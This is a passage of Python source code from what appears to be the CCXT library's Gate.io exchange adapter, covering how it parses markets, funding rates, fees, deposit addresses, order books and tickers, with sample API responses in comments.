quote = self.safe_currency_code(quoteId)
takerPercent = self.safe_string(market, 'fee')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
amountPrecisionString = self.safe_string(market, 'amount_precision')
pricePrecisionString = self.safe_string(market, 'precision')
tradeStatus = self.safe_string(market, 'trade_status')
leverage = self.safe_number(market, 'leverage')
defaultMinAmountLimit = self.parse_number(self.parse_precision(amountPrecisionString))
margin = leverage is not None
result.append({
'id': id,
'symbol': base + '/' + quote,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': margin,
'swap': False,
'future': False,
'option': False,
'active': (tradeStatus == 'tradable'),
'contract': False,
'linear': None,
'inverse': None,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(amountPrecisionString)),
'price': self.parse_number(self.parse_precision(pricePrecisionString)),
},
'limits': {
'leverage': {
'min': self.parse_number('1'),
'max': self.safe_number(market, 'leverage', 1),
},
'amount': {
'min': self.safe_number(spotMarket, 'min_base_amount', defaultMinAmountLimit),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_quote_amount'),
'max': self.safe_number(market, 'max_quote_amount'),
},
},
'info': market,
})
return result
async def fetch_contract_markets(self, params):
result = []
swapSettlementCurrencies = self.get_settlement_currencies('swap', 'fetchMarkets')
futureSettlementCurrencies = self.get_settlement_currencies('future', 'fetchMarkets')
for c in range(0, len(swapSettlementCurrencies)):
settleId = swapSettlementCurrencies[c]
query = params
query['settle'] = settleId
response = await self.publicFuturesGetSettleContracts(query)
for i in range(0, len(response)):
parsedMarket = self.parse_contract_market(response[i], settleId)
result.append(parsedMarket)
for c in range(0, len(futureSettlementCurrencies)):
settleId = futureSettlementCurrencies[c]
query = params
query['settle'] = settleId
response = await self.publicDeliveryGetSettleContracts(query)
for i in range(0, len(response)):
parsedMarket = self.parse_contract_market(response[i], settleId)
result.append(parsedMarket)
return result
def parse_contract_market(self, market, settleId):
#
# Perpetual swap
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
# Delivery Futures
#
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
#
id = self.safe_string(market, 'name')
parts = id.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
date = self.safe_string(parts, 2)
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
settle = self.safe_currency_code(settleId)
expiry = self.safe_timestamp(market, 'expire_time')
symbol = ''
marketType = 'swap'
if date is not None:
symbol = base + '/' + quote + ':' + settle + '-' + self.yymmdd(expiry, '')
marketType = 'future'
else:
symbol = base + '/' + quote + ':' + settle
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
isLinear = quote == settle
return {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': marketType,
'spot': False,
'margin': False,
'swap': marketType == 'swap',
'future': marketType == 'future',
'option': marketType == 'option',
'active': True,
'contract': True,
'linear': isLinear,
'inverse': not isLinear,
'taker': self.parse_number(Precise.string_div(takerPercent, '100')), # Fee is in %, so divide by 100
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.safe_number(market, 'quanto_multiplier'),
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number('1'),
'price': self.safe_number(market, 'order_price_round'),
},
'limits': {
'leverage': {
'min': self.safe_number(market, 'leverage_min'),
'max': self.safe_number(market, 'leverage_max'),
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': self.parse_number(minPrice),
'max': self.parse_number(maxPrice),
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
}
async def fetch_option_markets(self, params={}):
result = []
underlyings = await self.fetch_option_underlyings()
for i in range(0, len(underlyings)):
underlying = underlyings[i]
query = params
query['underlying'] = underlying
response = await self.publicOptionsGetContracts(query)
#
# [
# {
# "orders_limit": "50",
# "order_size_max": "100000",
# "mark_price_round": "0.1",
# "order_size_min": "1",
# "position_limit": "1000000",
# "orderbook_id": "575967",
# "order_price_deviate": "0.9",
# "is_call": True, # True means Call False means Put
# "last_price": "93.9",
# "bid1_size": "0",
# "bid1_price": "0",
# "taker_fee_rate": "0.0004",
# "underlying": "BTC_USDT",
# "create_time": "1646381188",
# "price_limit_fee_rate": "0.1",
# "maker_fee_rate": "0.0004",
# "trade_id": "727",
# "order_price_round": "0.1",
# "settle_fee_rate": "0.0001",
# "trade_size": "1982",
# "ref_rebate_rate": "0",
# "name": "BTC_USDT-20220311-44000-C",
# "underlying_price": "39194.26",
# "strike_price": "44000",
# "multiplier": "0.0001",
# "ask1_price": "0",
# "ref_discount_rate": "0",
# "expiration_time": "1646985600",
# "mark_price": "12.15",
# "position_size": "4",
# "ask1_size": "0",
# "tag": "WEEK"
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'name')
parts = underlying.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
expiry = self.safe_timestamp(market, 'expiration_time')
strike = self.safe_string(market, 'strike_price')
isCall = self.safe_value(market, 'is_call')
optionLetter = 'C' if isCall else 'P'
optionType = 'call' if isCall else 'put'
symbol = symbol + ':' + quote + '-' + self.yymmdd(expiry) + ':' + strike + ':' + optionLetter
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': quote,
'baseId': baseId,
'quoteId': quoteId,
'settleId': quoteId,
'type': 'option',
'spot': False,
'margin': False,
'swap': False,
'future': False,
'option': True,
'active': True,
'contract': True,
'linear': True,
'inverse': False,
'taker': self.parse_number(Precise.string_div(takerPercent, '100')), # Fee is in %, so divide by 100
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.parse_number('1'),
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': strike,
'optionType': optionType,
'precision': {
'amount': self.parse_number('1'),
'price': self.safe_number(market, 'order_price_round'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': self.parse_number(minPrice),
'max': self.parse_number(maxPrice),
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
async def fetch_option_underlyings(self):
underlyingsResponse = await self.publicOptionsGetUnderlyings()
#
# [
# {
# "index_time": "1646915796",
# "name": "BTC_USDT",
# "index_price": "39142.73"
# }
# ]
#
underlyings = []
for i in range(0, len(underlyingsResponse)):
underlying = underlyingsResponse[i]
name = self.safe_string(underlying, 'name')
if name is not None:
underlyings.append(name)
return underlyings
def prepare_request(self, market=None, type=None, params={}):
"""
* @ignore
Fills request params contract, settle, currency_pair, market and account where applicable
:param dict market: CCXT market, required when type is None
:param str type: 'spot', 'swap', or 'future', required when market is None
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
# * Do not call for multi spot order methods like cancelAllOrders and fetchOpenOrders. Use multiOrderSpotPrepareRequest instead
request = {}
if market is not None:
if market['contract']:
request['contract'] = market['id']
request['settle'] = market['settleId']
else:
request['currency_pair'] = market['id']
else:
swap = type == 'swap'
future = type == 'future'
if swap or future:
defaultSettle = 'usdt' if swap else 'btc'
settle = self.safe_string_lower(params, 'settle', defaultSettle)
params = self.omit(params, 'settle')
request['settle'] = settle
return [request, params]
def spot_order_prepare_request(self, market=None, stop=False, params={}):
"""
* @ignore
Fills request params currency_pair, market and account where applicable for spot order methods like fetchOpenOrders, cancelAllOrders
:param dict market: CCXT market
:param bool stop: True if for a stop order
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
marginMode, query = self.get_margin_mode(stop, params)
request = {}
if not stop:
if market is None:
raise ArgumentsRequired(self.id + ' spotOrderPrepareRequest() requires a market argument for non-stop orders')
request['account'] = marginMode
request['currency_pair'] = market['id'] # Should always be set for non-stop
return [request, query]
def multi_order_spot_prepare_request(self, market=None, stop=False, params={}):
"""
* @ignore
Fills request params currency_pair, market and account where applicable for spot order methods like fetchOpenOrders, cancelAllOrders
:param dict market: CCXT market
:param bool stop: True if for a stop order
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
marginMode, query = self.get_margin_mode(stop, params)
request = {
'account': marginMode,
}
if market is not None:
if stop:
# gateio spot and margin stop orders use the term market instead of currency_pair, and normal instead of spot. Neither parameter is used when fetching/cancelling a single order. They are used for creating a single stop order, but createOrder does not call self method
request['market'] = market['id']
else:
request['currency_pair'] = market['id']
return [request, query]
def get_margin_mode(self, stop, params):
"""
* @ignore
Gets the margin type for self api call
:param bool stop: True if for a stop order
:param dict params: Request params
:returns: The marginMode and the updated request params with marginMode removed, marginMode value is the value that can be read by the "account" property specified in gateios api docs
"""
defaultMarginMode = self.safe_string_lower_2(self.options, 'defaultMarginMode', 'marginMode', 'spot') # 'margin' is isolated margin on gateio's api
marginMode = self.safe_string_lower_2(params, 'marginMode', 'account', defaultMarginMode)
params = self.omit(params, ['marginMode', 'account'])
if marginMode == 'cross':
marginMode = 'cross_margin'
elif marginMode == 'isolated':
marginMode = 'margin'
elif marginMode == '':
marginMode = 'spot'
if stop:
if marginMode == 'spot':
# gateio spot stop orders use the term normal instead of spot
marginMode = 'normal'
if marginMode == 'cross_margin':
raise BadRequest(self.id + ' getMarginMode() does not support stop orders for cross margin')
return [marginMode, params]
def get_settlement_currencies(self, type, method):
options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes
fetchMarketsContractOptions = self.safe_value(options, method, {})
defaultSettle = ['usdt'] if (type == 'swap') else ['btc']
return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)
async def fetch_currencies(self, params={}):
# sandbox/testnet only supports future markets
apiBackup = self.safe_value(self.urls, 'apiBackup')
if apiBackup is not None:
return None
response = await self.publicSpotGetCurrencies(params)
#
# {
# "currency": "BCN",
# "delisted": False,
# "withdraw_disabled": True,
# "withdraw_delayed": False,
# "deposit_disabled": True,
# "trade_disabled": False
# }
#
result = {}
# TODO: remove magic constants
amountPrecision = self.parse_number('1e-6')
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
currencyIdLower = self.safe_string_lower(entry, 'currency')
code = self.safe_currency_code(currencyId)
delisted = self.safe_value(entry, 'delisted')
withdrawDisabled = self.safe_value(entry, 'withdraw_disabled', False)
depositDisabled = self.safe_value(entry, 'deposit_disabled', False)
tradeDisabled = self.safe_value(entry, 'trade_disabled', False)
withdrawEnabled = not withdrawDisabled
depositEnabled = not depositDisabled
tradeEnabled = not tradeDisabled
listed = not delisted
active = listed and tradeEnabled and withdrawEnabled and depositEnabled
result[code] = {
'id': currencyId,
'lowerCaseId': currencyIdLower,
'name': None,
'code': code,
'precision': amountPrecision,
'info': entry,
'active': active,
'deposit': depositEnabled,
'withdraw': withdrawEnabled,
'fee': None,
'fees': [],
'limits': self.limits,
}
return result
async def fetch_funding_rate(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadSymbol(self.id + ' fetchFundingRate() supports swap contracts only')
request, query = self.prepare_request(market, None, params)
response = await self.publicFuturesGetSettleContractsContract(self.extend(request, query))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
return self.parse_funding_rate(response)
async def fetch_funding_rates(self, symbols=None, params={}):
await self.load_markets()
request, query = self.prepare_request(None, 'swap', params)
response = await self.publicFuturesGetSettleContracts(self.extend(request, query))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
result = self.parse_funding_rates(response)
return self.filter_by_array(result, 'symbol', symbols)
def parse_funding_rate(self, contract, market=None):
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
marketId = self.safe_string(contract, 'name')
symbol = self.safe_symbol(marketId, market)
markPrice = self.safe_number(contract, 'mark_price')
indexPrice = self.safe_number(contract, 'index_price')
interestRate = self.safe_number(contract, 'interest_rate')
fundingRate = self.safe_number(contract, 'funding_rate')
fundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000
fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')
return {
'info': contract,
'symbol': symbol,
'markPrice': markPrice,
'indexPrice': indexPrice,
'interestRate': interestRate,
'estimatedSettlePrice': None,
'timestamp': None,
'datetime': None,
'fundingRate': fundingRate,
'fundingTimestamp': fundingTime,
'fundingDatetime': self.iso8601(fundingTime),
'nextFundingRate': fundingRateIndicative,
'nextFundingTimestamp': None,
'nextFundingDatetime': None,
'previousFundingRate': None,
'previousFundingTimestamp': None,
'previousFundingDatetime': None,
}
async def fetch_network_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = await self.privateWalletGetDepositAddress(self.extend(request, params))
addresses = self.safe_value(response, 'multichain_addresses')
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
result = {}
for i in range(0, len(addresses)):
entry = addresses[i]
#
# {
# "chain": "ETH",
# "address": "0x359a697945E79C7e17b634675BD73B33324E9408",
# "payment_id": "",
# "payment_name": "",
# "obtain_failed": "0"
# }
#
obtainFailed = self.safe_integer(entry, 'obtain_failed')
if obtainFailed:
continue
network = self.safe_string(entry, 'chain')
address = self.safe_string(entry, 'address')
tag = self.safe_string(entry, 'payment_id')
tagLength = len(tag)
tag = tag if tagLength else None
result[network] = {
'info': entry,
'code': code,
'address': address,
'tag': tag,
}
return result
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = await self.privateWalletGetDepositAddress(self.extend(request, params))
#
# {
# "currency": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007",
# "multichain_addresses": [
# {
# "chain": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d",
# "payment_id": "391331007",
# "payment_name": "Tag",
# "obtain_failed": 0
# }
# ]
# }
#
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
addressField = self.safe_string(response, 'address')
tag = None
address = None
if addressField.find(' ') >= 0:
splitted = addressField.split(' ')
address = splitted[0]
tag = splitted[1]
else:
address = addressField
return {
'info': response,
'code': code,
'address': address,
'tag': tag,
'network': None,
}
async def fetch_trading_fee(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'currency_pair': market['id'],
}
response = await self.privateWalletGetFee(self.extend(request, params))
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
return self.parse_trading_fee(response, market)
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privateWalletGetFee(params)
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
return self.parse_trading_fees(response)
def parse_trading_fees(self, response):
result = {}
for i in range(0, len(self.symbols)):
symbol = self.symbols[i]
market = self.market(symbol)
result[symbol] = self.parse_trading_fee(response, market)
return result
def parse_trading_fee(self, info, market=None):
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
contract = self.safe_value(market, 'contract')
takerKey = 'futures_taker_fee' if contract else 'taker_fee'
makerKey = 'futures_maker_fee' if contract else 'maker_fee'
return {
'info': info,
'symbol': self.safe_string(market, 'symbol'),
'maker': self.safe_number(info, makerKey),
'taker': self.safe_number(info, takerKey),
}
async def fetch_transaction_fees(self, codes=None, params={}):
await self.load_markets()
response = await self.privateWalletGetWithdrawStatus(params)
#
# {
# "currency": "MTN",
# "name": "Medicalchain",
# "name_cn": "Medicalchain",
# "deposit": "0",
# "withdraw_percent": "0%",
# "withdraw_fix": "900",
# "withdraw_day_limit": "500000",
# "withdraw_day_limit_remain": "500000",
# "withdraw_amount_mini": "900.1",
# "withdraw_eachtime_limit": "90000000000",
# "withdraw_fix_on_chains": {
# "ETH": "900"
# }
# }
#
withdrawFees = {}
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
withdrawFees[code] = {}
withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')
if withdrawFix is None:
withdrawFix = {}
withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')
keys = list(withdrawFix.keys())
for i in range(0, len(keys)):
key = keys[i]
withdrawFees[code][key] = self.parse_number(withdrawFix[key])
return {
'info': response,
'withdraw': withdrawFees,
'deposit': {},
}
async def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
# defaultType = 'future'
market = None
if symbol is not None:
market = self.market(symbol)
type, query = self.handle_market_type_and_params('fetchFundingHistory', market, params)
request, requestParams = self.prepare_request(market, type, query)
request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'
if since is not None:
request['from'] = since / 1000
if limit is not None:
request['limit'] = limit
method = self.get_supported_mapping(type, {
'swap': 'privateFuturesGetSettleAccountBook',
'future': 'privateDeliveryGetSettleAccountBook',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# "time": 1646899200,
# "change": "-0.027722",
# "balance": "11.653120591841",
# "text": "XRP_USDT",
# "type": "fund"
# },
# ...
# ]
#
return self.parse_funding_histories(response, symbol, since, limit)
def parse_funding_histories(self, response, symbol, since, limit):
result = []
for i in range(0, len(response)):
entry = response[i]
funding = self.parse_funding_history(entry)
result.append(funding)
sorted = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, symbol, since, limit)
def parse_funding_history(self, info, market=None):
#
# {
# "time": 1646899200,
# "change": "-0.027722",
# "balance": "11.653120591841",
# "text": "XRP_USDT",
# "type": "fund"
# }
#
timestamp = self.safe_timestamp(info, 'time')
marketId = self.safe_string(info, 'text')
market = self.safe_market(marketId, market)
return {
'info': info,
'symbol': self.safe_string(market, 'symbol'),
'code': self.safe_string(market, 'settle'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'id': None,
'amount': self.safe_number(info, 'change'),
}
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# 'interval': '0', # depth, 0 means no aggregation is applied, default to 0
# 'limit': limit, # maximum number of order depth data in asks or bids
# 'with_id': True, # return order book ID
# }
#
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetOrderBook',
'margin': 'publicSpotGetOrderBook',
'swap': 'publicFuturesGetSettleOrderBook',
'future': 'publicDeliveryGetSettleOrderBook',
})
if limit is not None:
request['limit'] = limit # default 10, max 100
request['with_id'] = True
response = await getattr(self, method)(self.extend(request, query))
#
# SPOT
#
# {
# "id": 6358770031
# "current": 1634345973275,
# "update": 1634345973271,
# "asks": [
# ["2.2241","12449.827"],
# ["2.2242","200"],
# ["2.2244","826.931"],
# ["2.2248","3876.107"],
# ["2.225","2377.252"],
# ["2.22509","439.484"],
# ["2.2251","1489.313"],
# ["2.2253","714.582"],
# ["2.2254","1349.784"],
# ["2.2256","234.701"]],
# "bids": [
# ["2.2236","32.465"],
# ["2.2232","243.983"],
# ["2.2231","32.207"],
# ["2.223","449.827"],
# ["2.2228","7.918"],
# ["2.2227","12703.482"],
# ["2.2226","143.033"],
# ["2.2225","143.027"],
# ["2.2224","1369.352"],
# ["2.2223","756.063"]
# ]
# }
#
# Perpetual Swap
#
# {
# "id": 6358770031
# "current": 1634350208.745,
# "asks": [
# {"s": 24909, "p": "61264.8"},
# {"s": 81, "p": "61266.6"},
# {"s": 2000, "p": "61267.6"},
# {"s": 490, "p": "61270.2"},
# {"s": 12, "p": "61270.4"},
# {"s": 11782, "p": "61273.2"},
# {"s": 14666, "p": "61273.3"},
# {"s": 22541, "p": "61273.4"},
# {"s": 33, "p": "61273.6"},
# {"s": 11980, "p": "61274.5"}
# ],
# "bids": [
# {"s": 41844, "p": "61264.7"},
# {"s": 13783, "p": "61263.3"},
# {"s": 1143, "p": "61259.8"},
# {"s": 81, "p": "61258.7"},
# {"s": 2471, "p": "61257.8"},
# {"s": 2471, "p": "61257.7"},
# {"s": 2471, "p": "61256.5"},
# {"s": 3, "p": "61254.2"},
# {"s": 114, "p": "61252.4"},
# {"s": 14372, "p": "61248.6"}
# ],
# "update": 1634350208.724
# }
#
timestamp = self.safe_integer(response, 'current')
if not market['spot']:
timestamp = timestamp * 1000
priceKey = 0 if market['spot'] else 'p'
amountKey = 1 if market['spot'] else 's'
nonce = self.safe_integer(response, 'id')
result = self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)
result['nonce'] = nonce
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTickers',
'margin': 'publicSpotGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'future': 'publicDeliveryGetSettleTickers',
})
response = await getattr(self, method)(self.extend(request, query))
ticker = self.safe_value(response, 0)
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# SPOT
#
# {
# "currency_pair": "KFC_USDT",
# "last": "7.255",
# "lowest_ask": "7.298",
# "highest_bid": "7.218",
# "change_percentage": "-1.18",
# "base_volume": "1219.053687865",
# "quote_volume": "8807.40299875455",
# "high_24h": "7.262",
# "low_24h": "7.095"
# }
#
# LINEAR/DELIVERY
#
# {
# "contract": "BTC_USDT",
# "last": "6432",
# "low_24h": "6278",
# "high_24h": "6790",
# "change_percentage": "4.43",
# "total_size": "32323904",
# "volume_24h": "184040233284",
# "volume_24h_btc": "28613220",
# "volume_24h_usd": "184040233284",
# "volume_24h_base": "28613220",
# "volume_24h_quote": "184040233284",
# "volume_24h_settle": "28613220",
# "mark_price": "6534",
# "funding_rate": "0.0001",
# "funding_rate_indicative": "0.0001",
# "index_price": "6531"
# }
#
marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
last = self.safe_string(ticker, 'last')
ask = self.safe_string(ticker, 'lowest_ask')
bid = self.safe_string(ticker, 'highest_bid')
high = self.safe_string(ticker, 'high_24h')
low = self.safe_string(ticker, 'low_24h')
baseVolume = self.safe_string_2(ticker, 'base_volume', 'volume_24h_base')
quoteVolume = self.safe_string_2(ticker, 'quote_volume', 'volume_24h_quote')
percentage = self.safe_string(ticker, 'change_percentage')
return self.safe_ticker({
'symbol': symbol,
'timestamp': None,
'datetime': None,
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
